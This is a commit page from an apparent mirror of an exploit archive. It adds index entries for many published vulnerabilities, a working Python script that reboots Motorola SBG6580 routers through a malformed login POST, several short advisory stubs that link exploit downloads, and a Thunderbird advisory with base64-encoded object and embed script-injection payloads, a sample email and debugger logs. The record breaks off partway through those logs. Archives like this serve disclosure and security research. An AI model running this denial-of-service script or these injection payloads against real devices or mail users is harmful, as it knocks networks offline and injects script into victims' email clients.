bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 01_29_2014

Browse source
This commit is contained in:
Offensive Security 2014-01-29 04:25:13 +00:00
parent 345d75ccef
commit 816ac77f08
39 changed files with 4954 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

42
files.csv
View file

@ -27537,6 +27537,7 @@ id,file,description,date,author,platform,type,port
30684,platforms/php/webapps/30684.txt,"SiteBar <= 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
30685,platforms/php/webapps/30685.txt,"SiteBar <= 3.3.8 index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
30688,platforms/hardware/webapps/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - DoS Reboot",2014-01-04,nicx0,hardware,webapps,0
30689,platforms/php/webapps/30689.php,"Taboada Macronews <= 1.0 - SQLi Exploit",2014-01-04,Jefrey,php,webapps,0
30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 Multiple Cross Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0
30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability",2007-10-18,anonymous,windows,remote,0
@ -27933,6 +27934,7 @@ id,file,description,date,author,platform,type,port
31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk operator/article/article_search_results.asp txtSearch Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0
31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk operator/article/article_attachment.asp Attach_Id Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0
31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 DELE Command Remote Buffer Overflow Vulnerability",2008-02-04,j0rgan,windows,dos,0
31106,platforms/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - Multiple Buffer Overflow Vulnerabilities and Authentication Bypass Vulnerability",2008-02-04,"Luigi Auriemma",multiple,remote,0
31107,platforms/php/webapps/31107.txt,"Portail Web Php 2.5.1 config/conf-activation.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
31108,platforms/php/webapps/31108.txt,"Portail Web Php 2.5.1 menu/item.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
31109,platforms/php/webapps/31109.txt,"Portail Web Php 2.5.1 modules/conf_modules.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
@ -27945,6 +27947,7 @@ id,file,description,date,author,platform,type,port
31116,platforms/php/webapps/31116.txt,"Pagetool 1.07 'search_term' Parameter Cross-Site Scripting Vulnerability",2008-02-06,Phanter-Root,php,webapps,0
31117,platforms/asp/webapps/31117.txt,"WS_FTP Server 6 /WSFTPSVR/FTPLogServer/LogViewer.asp Authentication Bypass",2008-02-06,"Luigi Auriemma",asp,webapps,0
31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 File Converter Field Length Remote Code Execution Vulnerability",2008-02-06,"Luigi Auriemma",windows,remote,0
31119,platforms/multiple/remote/31119.txt,"TinTin++ and WinTin++ 1.97.9 - '#chat' Command Multiple Security Vulnerabilities",2008-02-06,"Luigi Auriemma",multiple,remote,0
31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 index.php Multiple Parameter XSS",2008-02-07,"Alexandr Polyakov",php,webapps,0
31121,platforms/php/webapps/31121.txt,"Joomla! and Mambo com_sermon 0.2 Component 'gid' Parameter SQL Injection Vulnerability",2008-02-07,S@BUN,php,webapps,0
31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 Multiple Security Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0
@ -27973,7 +27976,9 @@ id,file,description,date,author,platform,type,port
31145,platforms/php/webapps/31145.txt,"Easy POS System - SQL Injection (login.php)",2014-01-23,vinicius777,php,webapps,0
31146,platforms/php/webapps/31146.txt,"Cells Blog 3.3 - XSS Reflected & Blind SQLite Injection",2014-01-23,vinicius777,php,webapps,0
31147,platforms/php/webapps/31147.txt,"Adult Webmaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps,0
31148,platforms/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String and Denial of Service Vulnerabilities",2008-02-11,"Luigi Auriemma",multiple,dos,0
31149,platforms/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x Backslash Directory Traversal Vulnerability",2008-02-11,"Luigi Auriemma",windows,remote,0
31150,platforms/multiple/dos/31150.txt,"RPM Remote Print Manager 4.5.1 - Service Remote Buffer Overflow Vulnerability",2008-02-11,"Luigi Auriemma",multiple,dos,0
31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin Local Stack Based Buffer Overflow Vulnerability",2008-02-12,forensec,linux,local,0
31152,platforms/php/webapps/31152.txt,"artmedic weblog artmedic_print.php date Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
31153,platforms/php/webapps/31153.txt,"artmedic weblog index.php jahrneu Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
@ -27996,9 +28001,9 @@ id,file,description,date,author,platform,type,port
31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
31177,platforms/windows/dos/31177.html,"MW6 Technologies DataMatrix ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 ActiveX (IconCreate Method) - Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0
31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0
31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001
31181,platforms/windows/remote/31181.rb,"HP Data Protector Backup Client Service Directory Traversal",2014-01-24,metasploit,windows,remote,5555
31181,platforms/windows/remote/31181.rb,"HP Data Protector Backup Client Service - Directory Traversal",2014-01-24,metasploit,windows,remote,5555
31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
31183,platforms/php/webapps/31183.txt,"SkyBlueCanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80
31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager <= 6.1 'key' Parameter SQL Injection Vulnerability",2008-02-13,"Nico Leidecker",java,webapps,0
@ -28030,3 +28035,36 @@ id,file,description,date,author,platform,type,port
31215,platforms/php/webapps/31215.txt,"Joomla! and Mambo com_filebase Component 'filecatid' Parameter SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0
31216,platforms/php/webapps/31216.txt,"Joomla! and Mambo com_scheduling Component 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
31217,platforms/php/webapps/31217.txt,"BanPro DMS 1.0 'index.php' Local File Include Vulnerability",2008-02-16,muuratsalo,php,webapps,0
31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service Vulnerability",2008-02-17,"Luigi Auriemma",linux,dos,0
31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Password Reset CSRF from Stored XSS (Web UI)",2014-01-27,"David Um",windows,webapps,0
31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow PoC",2014-01-27,Citadelo,windows,dos,0
31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0
31224,platforms/php/webapps/31224.txt,"Joomla! and Mambo com_profile Component 'oid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 'admin.php' Cross-Site Scripting Vulnerability",2008-02-18,NBBN,php,webapps,0
31226,platforms/php/webapps/31226.txt,"Joomla! and Mambo com_detail Component 'id' Parameter SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0
31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x 'sf-profile.php' SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0
31228,platforms/php/webapps/31228.txt,"WordPress Recipes Blog Plugin 'id' Parameter SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0
31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0
31230,platforms/php/webapps/31230.txt,"WordPress wp-people Plugin 2.0 'wp-people-popup.php' SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0
31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 Directory Traversal Vulnerability",2008-02-19,"Luigi Auriemma",windows,remote,0
31232,platforms/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow Vulnerability",2008-02-16,"Luigi Auriemma",multiple,dos,0
31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 beta /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0
31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 beta /show_gallery_pic id Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0
31235,platforms/php/webapps/31235.txt,"Jinzora 2.7.5 index.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0
31236,platforms/php/webapps/31236.txt,"Jinzora 2.7.5 ajax_request.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0
31237,platforms/php/webapps/31237.txt,"Jinzora 2.7.5 slim.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0
31238,platforms/php/webapps/31238.txt,"Jinzora 2.7.5 popup.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0
31239,platforms/php/webapps/31239.txt,"Google Hack Honeypot File Upload Manager 1.3 'delall' Unauthorized File Access Vulnerability",2008-02-19,Mr-m07,php,webapps,0
31240,platforms/php/webapps/31240.txt,"SmarterTools SmarterMail 4.3 Subject Field HTML Injection Vulnerability",2008-02-19,"Juan Pablo Lopez Yacubian",php,webapps,0
31241,platforms/php/webapps/31241.txt,"PHP-Nuke Sections Module 'artid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31242,platforms/php/webapps/31242.txt,"Facile Forms 1.x 'catid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31243,platforms/php/webapps/31243.txt,"Joomla! and Mambo 'com_team' Component SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31244,platforms/php/webapps/31244.txt,"Joomla! and Mambo com_iigcatalog Component 'cat' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31245,platforms/php/webapps/31245.txt,"Joomla! and Mambo com_formtool Component 'catid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31246,platforms/php/webapps/31246.txt,"Joomla! and Mambo com_genealogy Component 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31247,platforms/php/webapps/31247.txt,"iJoomla com_magazine Component 'pageid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31248,platforms/php/webapps/31248.txt,"XOOPS 'vacatures' Module 'cid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31249,platforms/php/webapps/31249.txt,"XOOPS 'events' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31250,platforms/php/webapps/31250.txt,"XOOPS 'seminars' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0
31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module 'cid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0

Can't render this file because it is too large.

33
platforms/hardware/webapps/30688.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: Motorola SBG6580 Cable Modem & Wireless-N Router Denial of Service
# Date: 01/03/14
# Exploit Author: nicx0
# Vendor Homepage: http://www.motorola.com/
# Software Link: http://www.motorola.com/us/SBG6580-SURFboard%C2%AE-eXtreme-Wireless-Cable-Modem/70902.html
# Version: SBG6580-6.5.0.0-GA-00-226-NOSH
# POSTing a bad login page parameter causes the router to reboot.
import sys
import socket
import urllib2
import urllib
router_ip = ''
try:
router_ip = str(sys.argv[1])
except:
print 'motobug.py ip_address : e.g. motobug.py 192.168.0.1'
sys.exit(2)
query_args = {'this_was':'too_easy'}
url = 'http://' + router_ip + '/goform/login'
post_data = urllib.urlencode(query_args)
request = urllib2.Request(url, post_data)
try:
print '[+] Sending invalid POST request to ' + url + '...'
response = urllib2.urlopen(request,timeout=5)
except socket.timeout:
print '[+] Success! No response from the modem.'
except urllib2.HTTPError:
print '[-] Failed: HTTP error received. The modem might not be a SBG6580.'
except urllib2.URLError:
print '[-] Failed: URL error received. Check the IP address again..'
else:
print '[-] Failed: HTTP response received. Modem does not appear to be vulnerable.'

9
platforms/linux/dos/31218.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27845/info
freeSSHd is prone to a remote denial-of-service vulnerability because it fails to handle exceptional conditions.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
This issue affects freeSSHd 1.2.0 and prior versions.
http://www.exploit-db.com/sploits/31218.zip

16
platforms/multiple/dos/31148.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/27734/info
Opium OPI Server and CyanPrintIP are prone to a denial-of-service vulnerability and a format-string vulnerability.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application or crash the application, denying service to legitimate users.
These issues affect the following products:
Opium OPI Server 4.10.1028 and prior
cyanPrintIP Easy OPI 4.10.1028 and prior
cyanPrintIP Professional 4.10.1030 and prior
cyanPrintIP Workstation 4.10.936 and prior
cyanPrintIP Standard 4.10.940 and prior
cyanPrintIP Basic 4.10.1030 and prior
http://www.exploit-db.com/sploits/31148.zip

9
platforms/multiple/dos/31150.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27742/info
RPM Remote Print Manager is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it into an insufficiently sized buffer.
An attacker may exploit this issue to execute arbitrary code or cause denial-of-service conditions.
The issue affects RPM Elite and Select 4.5.1.11 and prior versions.
http://www.exploit-db.com/sploits/31150.zip

414
platforms/multiple/dos/31223.txt Executable file
View file

@ -0,0 +1,414 @@
Document Title:
===============
Mozilla Bug Bounty #5 - WireTap Remote Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=953
Mozilla Bug Tracking ID: 875818
Video: http://www.vulnerability-lab.com/get_content.php?id=1182
Partner News (Softpedia): http://news.softpedia.com/news/Critical-Validation-and-Filter-Bypass-Vulnerability-Fixed-in-Thunderbird-420962.shtml
Release Date:
=============
2014-01-27
Vulnerability Laboratory ID (VL-ID):
====================================
953
Common Vulnerability Scoring System:
====================================
7.3
Product & Service Introduction:
===============================
Thunderbird is a free, open-source, cross-platform application for managing email and news feeds. It is a
local (rather than a web-based) email application that is powerful yet easy-to-use. Thunderbird has lots of cool features.
Thunderbird gives you control and ownership over your email. There are lots of add-ons available for Thunderbird that
enable you to extend and customize your email experience. Thunderbird is part of the Mozilla Manifesto, a pledge that
describes Mozilla`s commitment to an open, accessible, egalitarian Internet.
( Copy of the Vendor Homepage: http://www.mozilla.org )
( Copy of the Product Homepage: http://www.mozilla.org/en-US/thunderbird/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a critical validation and filter bypass vulnerability in the official Mozilla Thunderbird 17.0.6 email software.
Vulnerability Disclosure Timeline:
==================================
2013-05-10: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-05-11: Vendor Notification (Mozilla Security Incident Team)
2013-05-21: Vendor Response/Feedback (Mozilla Security Incident Team)
2014-01-18: Vendor Fix/Patch (Mozilla Developer Team - Reward 1.500$ SWB)
2014-01-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Mozilla
Product: Thunderbird - EMail Application 17.0.6
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
It has been discovered that the security controls / filters currently being used in Mozilla Thunderbird application can be easily
evaded if an attacker decides to encrypt the payloads with base64 encryption and combine it with the <object> tag. During the testing,
it was initially noticed that malicious javascript tags were being filtered / blocked in the Thunderbird application however, Attaching
a debugger with the Thunderbird .exe file revealed some very interesting information and gave much better insight behind the actual
working of the application. Most of the information revealed is Javascript errors which gave the researcher much hope in believing that
the application might actually be vulnerable.
By default, HTML tags like <script> and <iframe> are blocked in Thunderbird and get filtered immediately upon insertion however,
While drafting a new email message, attackers can easily bypass the current input filters by encoding their payloads
with base64 encryption and using the <object> tag and insert malicious scripts / code eg. (script / frame) within the emails
and send it to the victims. The exploit gets triggered once the victim decides to reply back and clicks on the `Reply` or `Forward` Buttons.
After successfully bypassing the input filters, an attacker can inject persistent script code while writing a new email and send it to victims.
Interestingly the payload gets filtered during the initial viewing mode however if the victim clicks on Reply or Forward, the exploit gets executed
successfully. For a POC i will be including multiple examples in this advisory for your review. I was able to run multiple scripts generating strange
behaviour on the application which can be seen in the debugging errors which I have attached along with this report.
These sort of vulnerabilities can result in multiple attack vectors on the client end which may eventually result in complete
compromise of the end user system. The persistent code injection vulnerability is located within the main application.
Exploitation of this persistent application vulnerability requires a low or medium user interaction. Successful exploitation of
the vulnerability may result in malicious script code being executed in the victims browser resulting in script code injection,
persistent phishing, Client side redirects and similar client side attacks.
Vulnerable Service(s):
[+] Mozilla Thunderbird 17.0.6 - Latest Release
Vulnerable Section(s):
[+] Write (Create a new message)
[+] Email Signature (Account Settings)
[+] Attach File with Signature as HTML (Account Settings)
Proof of Concept (PoC):
=======================
The filter bypass & persistent script code inject web vulnerabilities can be exploited by remote attackers without privileged user account
or direct user interaction. For security demonstration or to reproduce the vulnerability follow the provided steps and information below.
Proof of Concept #1
a) Create a new email message
b) In the body text, insert new HTML tag with the POC "Payload"
c) Send the email to the victim
d) Open the new email in the victim browser and click Reply
e) You should now see a Javascript Application popup window proving the existence of this vulnerability.
Proof of Concept #2
a) Goto Tools and then Account Settings
b) Under the Signature Text, insert the Payload and enable 'Use HTML'
c) Close the menu and Click on "Write" to create a new email
d) You should get a popup the moment new Email editor window opens up proving the existence of this vulnerability.
Proof of Concept #3
a) Create a new text file on your desktop (local computer) and insert the POC payload in it and save it as test.html (HTML)
b) Goto Tools and then Account Settings
c) Below the Signature Text box, enable 'Attach the signature from a file instead'
d) Click Choose and select the 'test.html' file which you created in step a.
e) Click on Write and you should be able to see the Javascript popup proving the existence of this vulnerability.
Payload #1
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24t
UE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=
"></object>
Payload #2
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIk1vemlsbGEt
VGh1bmRlcmJpcmQtU2NyaXB0LUNvZGUtSW5qZWN0aW9uLVBPQy1BdGVlcS1LaGFuIik7PC9zY3Jp
cHQ+PC9zdmc+" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
1.3
POC Technical Description:
Here, we used the data URI payload as a value assigned to the data attribute of the object tag. The <object> tag is used to include objects
such as images, audio, videos, Java applets, ActiveX, PDF, and Flash. The data attribute of the object tag defines a URL that refers to the
objects data. Data in the "data:" URI is encoded as a base64 string:
Base64-encoded payload: PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=
Base64-decoded payload: <script>alert("Mozilla-Thunderbird-Script-Code-Injection-POC-Ateeq-Khan");</script>
When the browser loads the object tag, it loads an object (in our case, its a javascript) assigned to its data attribute. This causes execution
of our javascript. We were able to bypass the application blacklist filter because of the base64-encoded payload.
1.4
Email Header showing the hidden malicious payload
Message-ID: <5195AABB.9000409@ccure.it>
Date: Fri, 17 May 2013 08:57:47 +0500
From: Ateeq Khan <ateeq@ccure.it>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20130509 Thunderbird/17.0.6
MIME-Version: 1.0
To: ateeq <ateeq@ccure.it>
Subject: Test
X-Enigmail-Version: 1.5.1
Content-Type: multipart/alternative;
boundary="------------070707070308040102070208"
X-Provags-ID: V02:K0:x1sxyB72JjArK0t7OpMGlUdnbY0vjneQvJdkX/twIfw
QgzRaY5JN/SeFJ/fl2yULg+LJCKojYYGFR/8wrcS9hv6B6WWrN
mur6d1IsxEn2D2kZt5fQ3tk8Z1qDiEpN5C7vrtOyEFAMJR3NHg
jsL6elL9oxDkDRj1rYWvipndH1vonoPT3kjbcmuPsEZwYZ0JkL
BjvA5CQE3qDMPgd5nzdT8SqKBRrj9u7m/irxCWHeJcnAG0XBnK
txadh05EhpYjzrsz2kd+EyQe8ABh9F+yHQs6PBgIJeMDhm3EmY
KPDb5TDHAsnDSD7e3jSaj1t/jhHWc4OA+Okkw+PsyBasdNvzw=
=
X-UI-Junk: AutoNotJunk -999 (UWL);
V01:9SSPrMSv:3OJduITnBKJW2sO9FDRIJW8REKQH86F2DhxLUWcUUFzS1g0JhJ7
GgRkniiwfqYstxpjhSj957gz/8tEx07A4XeXZriK0TD0WhS1DXezTz/TtZsDYDEh
hoWYOFl3bb5yC2QDLQsFZpUW8W11Q1ueL83Jxhvv1UmeH1zGnYFLHhAFOpzxH4jN
652vXWc8dXjmX/WjTrvcI6NDjWdTTTfnDoO2PVFxLR+Tspu5HEv+SDuyrKv18Pei
ogK+aeYsHnGw+Sv4tyfEE3I/nLbDefudGihBnld6s0loLxOOAGeIYxOeZ4Je+v0h
MH9Y6ICIP7qvG/CkWt1PYQDzeNRPMANzlOgD/c//0kMjpKd6GwFWZIgfLyEFGGGA
5ghpw5skyHXrAcf+FBq4ayJpL2UIfGeghWw==
X-Nemesis-Spam: whitelist
Envelope-To: ateeq@ccure.it
This is a multi-part message in MIME format.
--------------070707070308040102070208
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
--
--------------070707070308040102070208
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head>
<body text="#000000" bgcolor="#FFFFFF">
<object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=
"></object>
<div class="moz-signature">-- <br>
<script>alert(1)</script></div>
</body>
</html>
--------------070707070308040102070208--
1.5
Interesting Raw Application Logs captured during the entire process of testing:
(4fbc.3828): Break instruction exception - code 80000003 (first chance)
eax=fff82000 ebx=00000000 ecx=00000000 edx=7792f85a esi=00000000 edi=00000000
eip=778a000c esp=0ffffd94 ebp=0ffffdc0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!DbgBreakPoint:
778a000c cc int 3
0:040> g
[JavaScript Error: "Search service falling back to synchronous initialization at SRCH_SVC__ensureInitialized@resource:///components/nsSearchService.js:2498
@resource:///components/nsSearchService.js:3476
_adjustAcItem@chrome://messenger/content/webSearch.xml:42
@chrome://messenger/content/webSearch.xml:22
" {file: "resource:///components/nsSearchService.js" line: 2499}]
[JavaScript Error: "2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression:
["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]
" {file: "resource:///modules/gloda/log4moz.js" line: 687}]
2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression:
["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]
[JavaScript Error: "2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression:
["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]
" {file: "resource:///modules/gloda/log4moz.js" line: 687}]
2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression:
["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]
[JavaScript Error: "An error occurred executing the cmd_insertHTMLWithDialog command: [Exception...
"Could not convert Native argument arg 3 [nsIDOMJSWindow.openDialog]" nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)"
location: "JS frame :: chrome://editor/content/ComposerCommands.js :: <TOP_LEVEL> :: line 2790" data: no]"
{file: "chrome://global/content/globalOverlay.js" line: 95}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml"
line: 1736}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml"
line: 1736}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/folderDisplay.js" line: 2342}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/folderDisplay.js" line: 2342}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it."
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml"
line: 1736}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml"
line: 1736}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it."
